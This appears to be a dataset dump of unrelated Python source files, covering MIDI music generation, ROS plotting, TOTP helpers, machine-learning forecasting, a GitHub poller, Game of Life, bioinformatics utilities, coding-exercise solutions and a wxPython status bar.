text
stringlengths 8
6.05M
|
|---|
import sys
import time
import rtmidi
import random
from funcgen import *
notes = ["C","Db","D","Eb","E","F","Gb","G","Ab","A","Bb","B"]
# Midi output setup
midiout = rtmidi.MidiOut()
available_ports = midiout.get_ports()
if available_ports:
midiout.open_port(0)
else:
midiout.open_virtual_port("My virtual output")
# Decide key
key = 0
# Tempo declaration
bpm = 80
length = 16
beats = 4
for i in range(len(sys.argv)):
if(sys.argv[i] == "-k"):
key = notes.index(sys.argv[i + 1])
elif(sys.argv[i] == "-t"):
bpm = int(sys.argv[i + 1])
elif(sys.argv[i] == "-l"):
length = int(sys.argv[i + 1])
elif(sys.argv[i] == "-b"):
beats = float(sys.argv[i + 1])
# Note durations
q = 60/bpm # quarter note
h = 2 * q # half note
w = 2 * h # whole note
e = q / 2 # eighth note
s = e / 2 # sixteenth note
measure = beats * q # length of measure
def play_note(note, duration): # Plays a single note
if note == None:
time.sleep(duration)
return
note_on = [0x90, note, 127] # Note start, note value, velocity (0-127)
note_off = [0x80, note, 0]
midiout.send_message(note_on)
time.sleep(duration)
midiout.send_message(note_off)
def play_chord(voicing, quality, root, duration): # Plays a chord given a tuple of ints
# Play the root in octaves
midiout.send_message([0x90, int(root) + 24 + key, 127])
midiout.send_message([0x90, int(root) + 36 + key, 127])
for var in voicing: # Send note_on messages for each note
note = int(var) + 60 + key
note_on = [0x90, note, 112]
midiout.send_message(note_on)
# code for playing the melody. plays chord for 1 measure, and randomly chooses quarter and eighth notes from the chord to play over that measure
playtime = 0
scale = major
note = 72 + key
lastnote = 72 + key
while playtime < measure:
possible_notes = []
# Determine by chord quality which notes we can play
if quality == "dominant":
possible_notes.extend(scale.tones[1::])
elif quality == "major":
possible_notes.extend(scale.tones[0:3])
possible_notes.extend(scale.tones[4:6])
elif quality == "phrygian":
possible_notes.extend(scale.tones[1:3])
possible_notes.extend(scale.tones[4::])
elif quality == "dorian":
possible_notes.extend(scale.tones[0:1])
possible_notes.extend(scale.tones[3:6])
elif quality == "aeolian":
possible_notes.extend(scale.tones[0:3])
possible_notes.extend(scale.tones[4:6])
# Bias the possible notes towards chord tones
for tone in voicing:
possible_notes.append(tone % 12)
# Adjust by octaves to minimize jumps
for tone in possible_notes:
if abs(lastnote - tone) > 7:
if abs(lastnote - (tone - 12)) <= 7:
possible_notes.append(tone - 12)
possible_notes.remove(tone)
elif abs(lastnote - (tone + 12)) <= 7:
possible_notes.append(tone + 12)
possible_notes.remove(tone)
# Adjust note to correct octave and key
note = random.choice(possible_notes) + 72 + key
# 1 in 7 chance to replace note with a rest
note = random.choices([note, None], weights = [6, 1], k=1)[0]
# Possible rhythmic durations
time = random.choices([w, (h + q), h, (q + e), q, (e + s), e, s], weights=[1, 2, 3, 4, 10, 3, 10, 3], k=1)[0]
# Measure handling
if ((playtime + time) > measure):
time = measure - playtime
playtime = playtime + time
if note != None:
lastnote = note
# Play note with given pitch and duration
play_note(note, time)
# Handling sixteenth notes to prevent extreme syncopation
if(time == s or time == (e + s)):
note = random.choice(possible_notes) + 72 + key
play_note(note, s)
playtime = playtime + s
# Stop the bass note
midiout.send_message([0x80, int(root) + 24 + key, 0])
midiout.send_message([0x80, int(root) + 36 + key, 0])
for var in voicing: # Send note_off messages for each note
note = int(var) + 60 + key
note_off = [0x80, note, 0]
midiout.send_message(note_off)
def closest_voicing(currentVoicing, nextChord):
best = -1
min_change = 999
for i in range(4):
voicing = nextChord.voicings[i]
semitones = 0
for j in range(min(len(currentVoicing), len(voicing))):
semitones += abs(currentVoicing[j] - voicing[j])
if semitones < min_change:
min_change = semitones
best = i
if best >= 0:
return nextChord.voicings[best]
else:
return random.choice(nextChord.voicings)
print("Key of " + notes[key])
prog = getProg(length)
lastVoicing = []
for chord in prog:
print(chord.symbol)
root = chord.root
voicing = closest_voicing(lastVoicing, chord)
quality = chord.quality
lastVoicing = voicing
play_chord(voicing, quality, root, h)
time.sleep(0.1)
del midiout
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Universitaet Bremen - Institute for Artificial Intelligence (Prof. Beetz)
#
# Author: Minerva Gabriela Vargas Gleason <minervavargasg@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import rospy
import rospkg
import sys
import yaml
import rosbag
from datetime import datetime
from geometry_msgs.msg import PoseArray
from visualization_msgs.msg import Marker
from visualization_msgs.msg import MarkerArray
class PlotTest:
def __init__(self, r=0.0, g=0.4, b=1.0):
self.r, self.g, self.b = r, g, b
rospy.Subscriber('/data_to_plot', PoseArray, self.plot_callback)
self.marker_pub = rospy.Publisher('eef_trajectory_marker_array', MarkerArray, queue_size=1)
#self.marker_pub = rospy.Publisher('visualization_marker', MarkerArray, queue_size=1)
self.flag = False
def plot_callback(self, pose_array):
#self.pose_array = pose_array
if len(pose_array.poses) > 0:
if not self.flag:
# self.write_bag(pose_array)
self.create_markers(pose_array, self.r, self.g, self.b)
self.flag = True
def create_markers(self, pose_array, r, g, b):
self.pose_array = pose_array
markerArray = MarkerArray()
for n,pose in enumerate(self.pose_array.poses):
marker = Marker()
marker.pose = pose
marker.header.frame_id = "odom"
marker.header.stamp = rospy.Time.now()
marker.id = n*b*10
marker.ns = "marker_" + str(n)
marker.type = marker.CUBE
marker.action = marker.ADD
marker.scale.x = 0.015
marker.scale.y = 0.015
marker.scale.z = 0.015
marker.color.r = r
marker.color.g = g
marker.color.b = b
marker.color.a = 1.0
markerArray.markers.append(marker)
#self.yaml_writer(markerArray)
rospy.loginfo('Plotting EEF trajectory')
self.marker_pub.publish(markerArray)
@staticmethod
def yaml_writer(markerArray):
# Write a YAML file with the parameters for the simulated controller
try:
# Open YAML configuration file
pack = rospkg.RosPack()
dir = pack.get_path('iai_markers_tracking') + '/test_plot_data/controller_param.yaml'
data = markerArray
# Write file
with open(dir, 'w') as outfile:
yaml.dump(data, outfile, default_flow_style=False)
except yaml.YAMLError:
rospy.logerr("Unexpected error while writing controller configuration YAML file:"), sys.exc_info()[0]
return -1
@staticmethod
def write_bag(pose_array):
pack = rospkg.RosPack()
hoy = datetime.now()
day = '-' + str(hoy.month) + '-' + str(hoy.day) + '_' + str(hoy.hour) + '-' + str(hoy.minute)
dir = pack.get_path('iai_markers_tracking') + '/test_plot_data/test_2017' + day + '.bag'
bag = rosbag.Bag(dir, 'w')
try:
bag.write('data_to_plot',pose_array)
finally:
bag.close()
return 0
def main(r=0.0, g=0.4, b=1.0):
PlotTest(r, g, b)
#play_bag()
return 0
def play_bag():
pt = PlotTest()
pack = rospkg.RosPack()
dir = pack.get_path('iai_trajectory_generation_boxy') + '/test_plot_data/test.bag'
bag = rosbag.Bag(dir)
for topic, msg, t in bag.read_messages(topics=['data_to_plot']):
print 'plot'
pt.create_markers(msg, 0.0, 0.4, 1.0)
bag.close()
if __name__ == '__main__':
try:
rospy.init_node('plot_eef_trajectory')
rate = rospy.Rate(200)
main()
except rospy.ROSInterruptException:
pass
|
import pyotp
from flask_security.utils import hash_password, verify_password
from .misc import gen_random_code, clean_random_code
BACKUP_CODE_COUNT = 16
ISSUER = 'Zcash Grants'
def gen_backup_code():
return f'{gen_random_code(5)}-{gen_random_code(5)}'.lower()
def gen_backup_codes():
return [gen_backup_code() for x in range(BACKUP_CODE_COUNT)]
def hash_backup_codes(codes):
return [hash_password(clean_random_code(c)) for c in codes]
def serialize_backup_codes(codes: tuple):
hashed = hash_backup_codes(codes)
return ','.join(hashed)
def deserialize_backup_codes(codes: str):
return codes.split(',')
def verify_and_update_backup_codes(code: str, serialized_codes: str):
hashed = deserialize_backup_codes(serialized_codes)
for i, hc in enumerate(hashed):
if verify_password(clean_random_code(code), hc):
del hashed[i]
return ','.join(hashed)
return None
def gen_otp_secret():
return pyotp.random_base32()
def verify_totp(secret: str, code: str):
totp = pyotp.TOTP(secret)
return totp.verify(code)
def current_totp(secret: str):
totp = pyotp.TOTP(secret)
return totp.now()
def gen_uri(secret: str, email: str):
return pyotp.totp.TOTP(secret).provisioning_uri(email, issuer_name=ISSUER)
|
import numpy as np
from sklearn.ensemble import GradientBoostingRegressor
class GradientBoosting:
def __init__(self, validate=True,adaptive=False):
self.x_train=None
self.y_train = None
np.set_printoptions(precision=5)
self.model = GradientBoostingRegressor(loss='ls',n_estimators=100)
self.adaptive=adaptive
self.validate=validate
def generate_x(self,X,dates,stepAhead):
xLoad=X[:,168:]
xTemp=X[:,:168]
newX=np.empty((xLoad.shape[0],13))
newX[:,0]=dates[:].hour
newX[:,1]=dates[:].dayofweek
newX[:,2:6]=xTemp[:,-4:]#last 4 hours available
newX[:,6:8]=xLoad[:,-2:] # 1 and 2 hour lagged load (last 2 hours available)
newX[:,8]=np.mean(xLoad[:,-24:],axis=1) #(average of last 24 hours available)
newX[:,9]=xLoad[:,-24+stepAhead-1] # 24 hour lagged load (matching with output)
newX[:,10]=xLoad[:,-48+stepAhead-1] # 48 hour lagged load (matching with output)
newX[:,11]=xLoad[:,-72+stepAhead-1] # 72 hour lagged load (matching with output)
newX[:,12]=xLoad[:,-168+stepAhead-1] # 168 hour lagged load (previous week - (matching with output))
return newX
def getRMSE(self, y, y_predict):
return np.sqrt((np.power(y_predict-y,2)).sum()/y_predict.size)
def fit(self, X, y):
if len(y.shape)<=1:
y=y.reshape([-1,1])
if self.validate:
return self.fit_validate(X,y)
self.model.fit(X,y.ravel())
self.x_train=X
self.y_train=y
def predict(self, X):
if len(X.shape)<=1:
X=X.reshape([1,-1])
if self.adaptive:
print 'adaptive...'
return self.predict_adaptive(X)
else:
return self.model.predict(X)
def predict_adaptive(self, X,y):
yhat=np.empty((X.shape[0],1))
for i in xrange(X.shape[0]):
_x=np.expand_dims(X[i,:],axis=0)
yhat[i,:]=self.model.predict(_x)
_y=y[i,:].reshape([1,-1])
self.x_train=np.concatenate([self.x_train,_x])
self.y_train=np.concatenate([self.y_train,_y])
self.model.fit(self.x_train,self.y_train.ravel())
return yhat
def fit_validate(self, X, y):
n_estimators=np.array([1,20,50,100])
bestN=0
best_error=np.inf
nVal=int(X.shape[0]*0.15)
yVal=y[-nVal:]
XVal = X[-nVal:,:]
yTrain = y[:nVal]
XTrain = X[:nVal,:]
for i,n in enumerate(n_estimators):
self.model = GradientBoostingRegressor(loss='ls',n_estimators=n)
self.model.fit(XTrain,yTrain.ravel())
y_val=self.model.predict(XVal)
error_v=self.getRMSE(yVal,y_val)
if error_v<best_error:
best_error=error_v
bestN=n
self.model = GradientBoostingRegressor(loss='ls',n_estimators=bestN)
self.model.fit(X, y.ravel())
self.x_train = X
self.y_train = y
|
from datetime import datetime
import math
import requests
import time
from alembic.util import CommandError
from bitcoin_acks.constants import PullRequestState
from bitcoin_acks.database import create_or_update_database
from bitcoin_acks.github_data.polling_data import PollingData
from bitcoin_acks.github_data.pull_requests_data import PullRequestsData
from bitcoin_acks.github_data.repositories_data import RepositoriesData
from bitcoin_acks.logging import log
class PullRequestEvents(RepositoriesData):
def __init__(self, repository_path: str, repository_name: str):
super(PullRequestEvents, self).__init__(repository_path=repository_path,
repository_name=repository_name)
self.etag = None
self.rate_limit_remaining = None
self.rate_limit_reset = None
self.last_update = datetime.utcnow()
def get(self):
url = self.api_url + 'repos/{0}/{1}/events?page=1&per_page=300'.format(
self.repo.path,
self.repo.name
)
headers = {}
if self.etag is not None:
headers['If-None-Match'] = self.etag
response = requests.get(url, auth=self.auth, headers=headers)
if response.status_code == 304:
return
response.raise_for_status()
self.etag = response.headers['etag']
self.rate_limit_remaining = int(response.headers['X-RateLimit-Remaining'])
self.rate_limit_reset = datetime.fromtimestamp(int(response.headers['X-RateLimit-Reset']))
events = response.json()
pull_request_numbers = set()
for event in events:
pr = (event['payload'].get('pull_request', None)
or event['payload'].get('issue', None)
)
if pr is not None and ('base' in pr.keys() or 'pull_request' in pr.keys()):
pull_request_numbers.add(pr['number'])
pr_data = PullRequestsData(repository_path=self.repo.path,
repository_name=self.repo.name)
for number in pull_request_numbers:
pr_data.update(number=number)
if __name__ == '__main__':
import os
repository_path = 'bitcoin'
repository_name = 'bitcoin'
log.debug('Running pull request events update script',
path=os.path.realpath(__file__),
repository_name=repository_name,
repository_path=repository_path
)
try:
create_or_update_database()
except CommandError as e:
log.debug('create_or_update_database failed', stack_info=True)
pr_events = PullRequestEvents(repository_path=repository_path,
repository_name=repository_name)
pr_data = PullRequestsData(repository_path=repository_path,
repository_name=repository_name)
# polling_data = PollingData(repository_path=repository_path,
# repository_name=repository_name)
while True:
pr_events.get()
# polling_data.update(last_event=True)
sleep_time = (datetime.utcnow() - pr_events.rate_limit_reset).seconds/pr_events.rate_limit_remaining
time.sleep(math.ceil(sleep_time)+5)
now = datetime.utcnow()
log.debug('In while True loop', sleep_time=sleep_time, now=now, last_update=pr_events.last_update)
if pr_events.last_update.day != now.day:
pr_data.update_all(state=PullRequestState.OPEN)
# polling_data.update(last_open_update=True)
elif pr_events.last_update.month != now.month:
pr_data.update_all()
# polling_data.update(last_full_update=True)
pr_events.last_update = now
|
from django.db import models
# from cloudinary.models import CloudinaryField
class Site(models.Model):
title = models.CharField('Titulo', max_length=120)
url = models.URLField('URL Site')
description = models.TextField('Descrição')
modified = models.DateField('Modificado em', auto_now=True)
created = models.DateField('Criado em', auto_now_add=True)
def __str__ (self):
return self.titulo
class Meta:
verbose_name = 'Site'
verbose_name_plural = 'Sites'
ordering = ['title']
|
class Board:
def __init__(self):
self.__rows = 16
self.__cols = 16
self.__matrix = [[0 for _ in range(self.__cols)] for _ in range(self.__rows)]
def load(self, file_name):
f = open(file_name, "r")
for line in f.readlines():
x, y = line.split(" ")
x = int(x)
y = int(y)
self.__matrix[x][y] = 1
def __str__(self):
result = ""
for i in range(self.__rows):
for j in range(self.__cols):
if self.__matrix[i][j] == 1:
result += "#"
else:
result += "@"
result += '\n'
return result
@property
def all(self):
result = []
for i in range(self.__rows):
for j in range(self.__cols):
if self.__matrix[i][j] == 1:
result.append((i, j))
return result
def update(self, i, j):
di = [0, 0, -1, -1, -1, 1, 1, 1]
dj = [-1, 1, 0, 1, -1, -1, 1, 0]
alive = 0
for d in range(8):
ii = i + di[d]
jj = j + dj[d]
if 0 <= ii < self.__rows and 0 <= jj < self.__cols and self.__matrix[ii][jj]:
alive += 1
if alive > 3 or alive < 2:
return 0
elif alive == 3:
return 1
return self.__matrix[i][j]
def update_board(self):
result = []
for i in range(self.__rows):
for j in range(self.__cols):
result.append((i, j, self.update(i, j)))
for elem in result:
i, j, c = elem
self.__matrix[i][j] = c
class SparseBoard:
def __init__(self):
self.__mat = {}
pass
def __setitem__(self, key, value):
i, j = key
if i not in self.__mat:
self.__mat[i] = {}
self.__mat[i][j] = value
if self.__mat[i][j] is None or self.__mat[i][j] == 0:
del self.__mat[i][j]
def __getitem__(self, key):
i, j = key
if i not in self.__mat:
return None
if j not in self.__mat[i]:
return None
return self.__mat[i][j]
@property
def all(self):
result = []
for i in self.__mat:
for j in self.__mat[i]:
result.append((i, j))
return result
def load(self, file_name):
f = open(file_name, "r")
for line in f.readlines():
x, y = line.split(" ")
x = int(x)
y = int(y)
self.__setitem__((y, x), 1)
def rules(self, i, j):
di = [0, 0, -1, -1, -1, 1, 1, 1]
dj = [-1, 1, 0, 1, -1, -1, 1, 0]
alive = 0
for d in range(8):
ii = i + di[d]
jj = j + dj[d]
if self.__getitem__((ii, jj)):
alive += 1
if alive > 3 or alive < 2:
return False
if alive == 3:
return True
if self.__getitem__((i, j)) == 1:
return True
return False
def update(self):
di = [0, 0, -1, -1, -1, 1, 1, 1]
dj = [-1, 1, 0, 1, -1, -1, 1, 0]
new_board = SparseBoard()
for i in self.__mat:
for j in self.__mat[i]:
for d in range(8):
ii = i + di[d]
jj = j + dj[d]
if self.rules(ii, jj):
new_board[(ii, jj)] = 1
del self.__mat
self.__mat = new_board.__mat
|
mass_table = {
'G': 57.021464, 'A': 71.037114, 'S': 87.032028, 'P': 97.052764,
'V': 99.068414, 'T': 101.047678, 'C': 103.009184, 'I': 113.084064,
'L': 113.084064, 'N': 114.042927, 'D': 115.026943, 'Q': 128.058578,
'K': 128.094963, 'E': 129.042593, 'M': 131.040485, 'H': 137.058912,
'F': 147.068414, 'R': 156.101111, 'Y': 163.063329, 'W': 186.079313}
dna_codon = {
'ATA':'I', 'ATC':'I', 'ATT':'I', 'ATG':'M',
'ACA':'T', 'ACC':'T', 'ACG':'T', 'ACT':'T',
'AAC':'N', 'AAT':'N', 'AAA':'K', 'AAG':'K',
'AGC':'S', 'AGT':'S', 'AGA':'R', 'AGG':'R',
'CTA':'L', 'CTC':'L', 'CTG':'L', 'CTT':'L',
'CCA':'P', 'CCC':'P', 'CCG':'P', 'CCT':'P',
'CAC':'H', 'CAT':'H', 'CAA':'Q', 'CAG':'Q',
'CGA':'R', 'CGC':'R', 'CGG':'R', 'CGT':'R',
'GTA':'V', 'GTC':'V', 'GTG':'V', 'GTT':'V',
'GCA':'A', 'GCC':'A', 'GCG':'A', 'GCT':'A',
'GAC':'D', 'GAT':'D', 'GAA':'E', 'GAG':'E',
'GGA':'G', 'GGC':'G', 'GGG':'G', 'GGT':'G',
'TCA':'S', 'TCC':'S', 'TCG':'S', 'TCT':'S',
'TTC':'F', 'TTT':'F', 'TTA':'L', 'TTG':'L',
'TAC':'Y', 'TAT':'Y', 'TAA':'_', 'TAG':'_',
'TGC':'C', 'TGT':'C', 'TGA':'_', 'TGG':'W'}
def parse(filepath):
with open(filepath) as f:
#n=0
dictionary = dict()
line = f.readline().rstrip()
while line != '':
#line = f.readline()
#print(line)
if line.startswith('>'):
try:
dictionary[seq_id] = ''.join(seq)
except:
True
seq_id = line.lstrip('>')
seq = []
else:
seq.append(line)
line = f.readline().rstrip()
try:
dictionary[seq_id] = ''.join(seq)
#return
except:
True
#print(dictionary)
return dictionary
def translate(dna_seq, start_from_start_codon=False, stop_on_stop_codons=False):
length = len(dna_seq)
#print(length)
step = 0
prot_string = str()
start = True
if start_from_aug:
start = False
while step<length-2:
codon = dna_seq[step:step+3]
if codon == 'ATG':
start = True
if start:
if stop_on_stop_codons and (codon in ['TAA', 'TGA', 'TAG']):
break
prot = dna_codon[codon]
prot_string = ''.join([prot_string, prot])
step += 3
return prot_string
def calc_mass(prot_seq):
sum = 0
for i in prot_seq:
sum += mass_table[i]
return sum
def orf(dna_seq):
length = len(dna_seq)
#print(length)
p_list = list()
#print('forward')
for step in [0,1,2]:
#print(step)
prot_string = str()
start = False
while step<length-2:
codon = dna_seq[step:step+3]
if codon == 'ATG':
#print('ATG')
start = True
#prot_string = ''.join([prot_string, 'M'])
if start:
if codon in ['TAA', 'TGA', 'TAG']:
start = False
break
#p_list.append(prot_string)
#prot_string = str()
#start = False
#continue
prot = dna_codon[codon]
prot_string = ''.join([prot_string, prot])
#print(prot_string)
step += 3
if not start:
p_list.append(prot_string)
#print('backward')
#dna_seq2 = dna_seq[::-1]
dna_seq2 = str()
#print(dna_seq)
#print(dna_seq2)
dd = {'A':'T','T':'A','C':'G','G':'C'}
#for i in dd.keys():
# print(i)
# for j in range(dna_seq2.count(i)):
# dna_seq2 = dna_seq2.replace(i, dd[i])
#print(dna_seq2)
for i in range(len(dna_seq)-1,-1,-1):
#dna_seq2.append()
#print(dna_seq[i])
dna_seq2 = ''.join([dna_seq2, dd[dna_seq[i]] ])
#print(dna_seq2)
for step in [0,1,2]:
#print(step)
prot_string = str()
start = False
while step<length-2:
codon = dna_seq2[step:step+3]
#print(codon)
#print('before', codon)
#dd = {'A':'T','T':'A','C':'G','G':'C'}
#for i in dd.keys():
# for j in range(codon.count(i)):
# codon = codon.replace(i, dd[i])
#print('after', codon)
if codon == 'ATG':
#print('ATG on position', step)
start = True
#prot_string = ''.join([prot_string, 'M'])
# WHY DONT I NEED TO ADD M!!! BECAUSE RIGHT AFTER THAT if start BECOMES TO BE TRUE
if start:
if codon in ['TAA', 'TGA', 'TAG']:
start = False
break
#p_list.append(prot_string)
#prot_string = str()
#start = False
#continue
prot = dna_codon[codon]
prot_string = ''.join([prot_string, prot])
#print(prot_string)
step += 3
if not start:
p_list.append(prot_string)
'''
for step in [length,length-1,length-2]:
#print(step)
prot_string = str()
start = False
while step>2:
print(step)
codon = dna_seq[step-1:step-4:-1]
if step == 3:
codon = dna_seq[step-1::-1]
print('before', codon)
dd = {'A':'T','T':'A','C':'G','G':'C'}
for i in dd.keys():
for j in range(codon.count(i)):
codon = codon.replace(i, dd[i])
print('after', codon)
if codon == 'ATG':
start = True
if start:
if codon in ['TAA', 'TGA', 'TAG']:
break
prot = dna_codon[codon]
prot_string = ''.join([prot_string, prot])
step -= 3
p_list.append(prot_string)'''
q = 0
while q<len(p_list):
if p_list[q]=='':
p_list.pop(q)
else:
if p_list.count(p_list[q])>1:
p_list.pop(q)
#print(p_list[q])
x = p_list[q].split('M')
#print(x)
x = [''.join(['M',i]) for i in x[1:]]
#print(x)
p_list.pop(q)
length = len(x)
for nn in range(length):
p_list.insert(q,''.join(x[nn:length]))
q+=1
#for i in range(len(p_list)):
# if
return p_list
|
from itertools import product
ADJACENT = {'1': '124', '2': '1235', '3': '236', '4': '1475', '5': '24568',
'6': '3569', '7': '478', '8': '05789', '9': '689', '0': '08'}
def get_pins(observed):
return [''.join(a) for a in product(*(ADJACENT[b] for b in observed))]
|
# -*- coding: utf-8 -*-
class Solution:
def maxLengthBetweenEqualCharacters(self, s: str) -> int:
occurrences, result = {}, -1
for i, c in enumerate(s):
if c in occurrences:
result = max(result, i - occurrences[c] - 1)
else:
occurrences[c] = i
return result
if __name__ == "__main__":
solution = Solution()
assert 0 == solution.maxLengthBetweenEqualCharacters("aa")
assert 2 == solution.maxLengthBetweenEqualCharacters("abca")
assert -1 == solution.maxLengthBetweenEqualCharacters("cbzxy")
assert 4 == solution.maxLengthBetweenEqualCharacters("cabbac")
|
def inverse_lookup(xs):
result = dict()
for i in range(0, len(xs)):
x = xs[i]
if x not in result:
result[x] = i
return result
def get_with_default(map, key, default):
raise NotImplementedError()
def count_frequencies(xs):
raise NotImplementedError()
def css_lookup(stylesheets, key, default):
raise NotImplementedError()
def word_width(letter_widths, word):
"""
Rekent de breedte van een woord uit in pixels.
Elke letter heeft een verschillende breedte.
De breedte van elke letter staat gegeven in
de dictionary letter_widths.
De breedte van het woord is gelijk aan de
som van de breedtes der letters.
Bv. letter_widths = { 'a': 16, 'b': 16, 'i': 5, 'l': '6', 'w': 20, ... }
word = 'walibi'
geeft als resultaat
20 + 16 + 6 + 5 + 16 + 5 = 68
"""
raise NotImplementedError()
def group_by_extension(filenames):
"""
Gegeven een lijst filenames waarvan de 3 laatste tekens
de extensie vormen, groepeer de bestandsnamen per extensie
in een dictionary.
De keys in de dictionary zijn de extensies,
de bijhorende waarde is een lijst van bestandsnamen
met die extensie.
Bv. [ 'foo.txt', 'bar.txt', 'baz.png' ]
moet de dictionary
{ 'txt': [ 'foo.txt', 'bar'txt' ],
'png': [ 'baz.png' ] }
opleveren.
"""
raise NotImplementedError()
|
import requests
from .builder import AmazonRequestBuilder
from .response import (
AmazonItemSearchResponse,
AmazonItemLookupResponse,
AmazonSimilarityLookupResponse,
)
class AmazonProductAPI(object):
def __init__(self, access_key, secret_key, associate_tag):
self.access_key = access_key
self.secret_key = secret_key
self.associate_tag = associate_tag
self.request_builder = AmazonRequestBuilder(access_key, secret_key, associate_tag)
def _base_params(self, search_index=None, response_groups=None, parameters=None):
if parameters is None:
parameters = {}
default_params = {
'Service': 'AWSECommerceService',
'AWSAccessKeyId': self.access_key,
'AssociateTag': self.associate_tag,
'ResponseGroup': 'Images,ItemAttributes',
'Version': '2013-08-01'
}
if response_groups:
default_params['ResponseGroup'] = ','.join(response_groups)
if search_index:
default_params['SearchIndex'] = search_index
parameters.update(default_params)
return parameters
def item_search(self, search_index, keywords=None, page=None, response_groups=None, parameters=None):
params = self._base_params(search_index, response_groups, parameters)
params['Operation'] = 'ItemSearch'
if keywords:
params['Keywords'] = ','.join(keywords)
if page:
params['ItemPage'] = page
req_url = self.request_builder.build_request_url(params)
response = self._make_get_request(req_url, AmazonItemSearchResponse)
return response
def item_lookup(self, item_id, id_type='ASIN', search_index=None, response_groups=None, parameters=None):
params = self._base_params(search_index, response_groups, parameters)
params['Operation'] = 'ItemLookup'
params['ItemId'] = item_id
params['IdType'] = id_type
req_url = self.request_builder.build_request_url(params)
response = self._make_get_request(req_url, AmazonItemLookupResponse)
return response
def similarity_lookup(self, asins, response_groups=None, parameters=None):
params = self._base_params(response_groups=response_groups, parameters=parameters)
if not isinstance(asins, (list,)):
asins = [asins]
params['Operation'] = 'SimilarityLookup'
params['ItemId'] = ','.join(asins)
req_url = self.request_builder.build_request_url(params)
response = self._make_get_request(req_url, AmazonSimilarityLookupResponse)
return response
def _make_get_request(self, req_url, response_class):
req = requests.get(req_url)
response = response_class(req)
return response
|
import os
import sys
from jinja2 import Template
basename = "/home/zcyang/fortinet/ddos/autotest/config"
dirname = "acl"
def get_settings(**args):
template_file = args.get('template')
variable_dict = args.get('variable_dict', {})
fname = os.path.join(basename, dirname, template_file)
print(fname)
fp = open(fname, 'r')
data = fp.read()
fp.close()
template = Template(data)
data_handle = template.render(**variable_dict)
current_setting = data_handle.split("\n")
current_setting = [commnad.strip() for commnad in current_setting]
current_setting.append(current_setting[0].replace('config','show'))
return current_setting
if __name__ == "__main__":
ar = sys.argv
args = {"variable_dict":{"aname":ar[1], "ip":ar[3]}, "template":ar[1]}
get_settings(**args)
|
"""
Created by Alejandro Daniel Noel
"""
from core import ale_optimizer
from core.plant_graph.ExternalSupplier import ExternalSupplier
from core.plant_graph.machine import Machine
from core.plant_graph.product import Product
from core.plant_graph.json_parser import write_json
ExternalSupplier.reset_instance_tracker()
flour = Product(name="flour", units='kg')
water = Product(name="water", units='liter')
cream = Product(name="cream", units='kg')
dough = Product(name="dough", units='kg', sub_products_quantities={flour: 0.4, water: 0.6})
filling = Product(name="filling", units='liter', sub_products_quantities={cream: 0.7, flour: 0.3})
pie = Product(name="pie", units='unit', sub_products_quantities={dough: 0.5, filling: 0.2})
dough_maker1 = Machine(name="Dough maker 1", min_batch_time=200, max_batch_time=1000, batch_time=500, batch_size=50,
output_product=dough)
filling_maker1 = Machine(name="Filling maker 1", min_batch_time=100, max_batch_time=500.0, batch_time=150, batch_size=20,
output_product=filling)
output_machine = Machine(name="Pie maker", min_batch_time=10, max_batch_time=300, batch_time=50, batch_size=30,
output_product=pie,
suppliers=[dough_maker1, filling_maker1], delays=[22.3, 20.1])
# maximum_output = ale_optimizer.maximize_output(output_machine)
# maximum_output = ale_optimizer.optimize_topology(output_machine, 1.55)
# maximum_output = ale_optimizer.maximize_output(output_machine)
output_machine.set_supplier_rates(0.2)
write_json(output_machine, "Optimized_plant.json")
# print("\nMaximum production is {} pies every second".format(maximum_output))
|
import wx
import os
import prefs
import datetime, time
import EnhancedStatusBar as ESB
from utility import platform
# get the images once at compile time
icons = {}
iconpath = os.path.join(wx.GetApp().path, "icons", "features")
if os.path.exists(iconpath):
for icon_file in os.listdir(iconpath):
feature, _ = icon_file.split('.')
icons[feature] = wx.Image(os.path.join(iconpath, icon_file)).ConvertToBitmap()
class StatusBar(ESB.EnhancedStatusBar):
def __init__(self, parent, connection):
ESB.EnhancedStatusBar.__init__(self, parent)
self.parent = parent
self.connection = connection
# status field
self.status_field = wx.Panel(self)
# "feature icons" container
self.feature_tray = wx.Window(self)
self.feature_sizer = wx.BoxSizer()
self.feature_icons = {}
for i,w in icons.items():
icon = FeatureIcon(self.feature_tray, i, w)
self.feature_sizer.Add(icon, 0, wx.EXPAND|wx.SHAPED)
icon.Hide()
self.feature_icons[i] = icon
self.feature_tray.SetSizerAndFit(self.feature_sizer)
# connected-time widget
self.conn_time = wx.StaticText(self, label = "--:--:--:--", style = wx.ALIGN_CENTER_HORIZONTAL)
# "connection status" light
self.conn_status = wx.Window(self)
self.conn_status.SetBackgroundColour(wx.RED)
# Activity blinker for when we're scrolled back
self.activity_blinker = wx.Window(self)
self.blinker_timer = None
# placeholder to keep stuff from being on top of the resizer thumb
self.spacer = wx.Window(self)
self.SetFieldsCount(6)
#self.SetStatusStyles([wx.SB_RAISED, wx.SB_NORMAL, wx.SB_NORMAL, wx.SB_NORMAL])
self.AddWidget(self.status_field , horizontalalignment = ESB.ESB_EXACT_FIT) ,
self.AddWidget(self.feature_tray , horizontalalignment = ESB.ESB_ALIGN_RIGHT , verticalalignment = ESB.ESB_EXACT_FIT)
self.AddWidget(self.conn_time , horizontalalignment = ESB.ESB_EXACT_FIT)
self.AddWidget(self.conn_status , horizontalalignment = ESB.ESB_EXACT_FIT)
self.AddWidget(self.activity_blinker, horizontalalignment = ESB.ESB_EXACT_FIT)
self.AddWidget(self.spacer , horizontalalignment = ESB.ESB_EXACT_FIT)
self.update_timer = wx.CallLater(1000, self.UpdateConnectionStatus)
self.status_timer = None
self.LayoutWidgets()
def Destroy(self):
if self.update_timer and self.update_timer.IsRunning(): self.update_timer.Stop()
if self.status_timer and self.status_timer.IsRunning(): self.status_timer.Stop()
def UpdateConnectionStatus(self, evt = None):
self.update_timer.Restart(1000)
conn = self.connection
if conn.is_connected():
self.conn_status.SetBackgroundColour(wx.GREEN)
self.conn_status.Refresh()
else:
self.conn_status.SetBackgroundColour(wx.RED)
self.conn_status.Refresh()
self.conn_time.SetLabel('')
self.conn_time.SetToolTip(None)
